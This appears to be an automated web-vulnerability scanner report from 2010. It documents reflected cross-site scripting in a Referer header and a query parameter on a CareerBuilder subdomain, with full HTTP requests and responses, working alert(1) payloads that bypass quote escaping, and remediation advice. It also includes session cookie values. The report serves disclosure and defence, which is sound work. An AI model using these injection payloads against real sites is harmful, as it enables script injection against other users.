The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida/?lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=56918\'%3balert(1)//e3aa076828a
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 179849
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:17:18 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Florid ...[SNIP]... lts'; s_cb.eVar5='JS_AS_State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 56918\\';alert(1)//e3aa076828a'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6309b\'%3balert(1)//59d7ac59f1b was submitted in the Referer HTTP header. This input was echoed as 6309b\\';alert(1)//59d7ac59f1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida/ HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=6309b\'%3balert(1)//59d7ac59f1b
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 180061
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 14 Nov 2010 23:00:40 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Florid ...[SNIP]... lts'; s_cb.eVar5='JS_AS_State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 6309b\\';alert(1)//59d7ac59f1b'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f480a\'%3balert(1)//b802c5c94bd was submitted in the Referer HTTP header. This input was echoed as f480a\\';alert(1)//b802c5c94bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=f480a\'%3balert(1)//b802c5c94bd
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176225
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 23:00:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - f480a\\';alert(1)//b802c5c94bd'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64d8c\'%3balert(1)//f4ef47d3f32 was submitted in the Referer HTTP header. This input was echoed as 64d8c\\';alert(1)//f4ef47d3f32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=64d8c\'%3balert(1)//f4ef47d3f32
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176040
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR4
Date: Sun, 14 Nov 2010 23:12:28 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 64d8c\\';alert(1)//f4ef47d3f32'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9545f\'%3balert(1)//6cfbcaa7226 was submitted in the Referer HTTP header. This input was echoed as 9545f\\';alert(1)//6cfbcaa7226 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh031 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9545f\'%3balert(1)//6cfbcaa7226
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176553
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=cbcb0fadca3b47c1a9569e6e471e16f6-343070704-RF-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650561189DB47D6ABB196DB4CB014BD6697662C7951FB969626D18C76975F0BABBE1A91E862CEC15D12; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:03 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:03 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL15
Date: Sun, 14 Nov 2010 22:25:03 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 9545f\\';alert(1)//6cfbcaa7226'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45845\'%3balert(1)//4dd1c60a594 was submitted in the Referer HTTP header. This input was echoed as 45845\\';alert(1)//4dd1c60a594 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami/ HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=45845\'%3balert(1)//4dd1c60a594
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176514
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=29994ae3a58f499198496a89a94deeb1-343070587-R3-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650E3907A73E359AD0C717375E6A181228710E52CC9569A7C897CB7D71421C75C1B4E5777777724DBD7; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:06 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:07 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL3
Date: Sun, 14 Nov 2010 22:23:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 45845\\';alert(1)//4dd1c60a594'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 480ef\'%3balert(1)//4797d19bb95 was submitted in the Referer HTTP header. This input was echoed as 480ef\\';alert(1)//4797d19bb95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami/JobResults.aspx HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=480ef\'%3balert(1)//4797d19bb95
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 42228
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 14 Nov 2010 22:56:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> 404 Fi ...[SNIP]... Name='accounting.careerbuilder.com/404.aspx'; s_cb.server='accounting'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 480ef\\';alert(1)//4797d19bb95'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1da0c\'%3balert(1)//d1efdea3b87 was submitted in the Referer HTTP header. This input was echoed as 1da0c\\';alert(1)//d1efdea3b87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=1da0c\'%3balert(1)//d1efdea3b87
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174866
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR43
Date: Sun, 14 Nov 2010 23:16:56 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 1da0c\\';alert(1)//d1efdea3b87'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c01d8\'%3balert(1)//66349a66c26 was submitted in the Referer HTTP header. This input was echoed as c01d8\\';alert(1)//66349a66c26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Accounting.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=c01d8\'%3balert(1)//66349a66c26
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174676
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR19
Date: Sun, 14 Nov 2010 23:00:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - c01d8\\';alert(1)//66349a66c26'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffdf8\'%3balert(1)//964dda6ef0c was submitted in the Referer HTTP header. This input was echoed as ffdf8\\';alert(1)//964dda6ef0c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=ffdf8\'%3balert(1)//964dda6ef0c
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 175013
Content-Type: text/html; charset=UTF-8
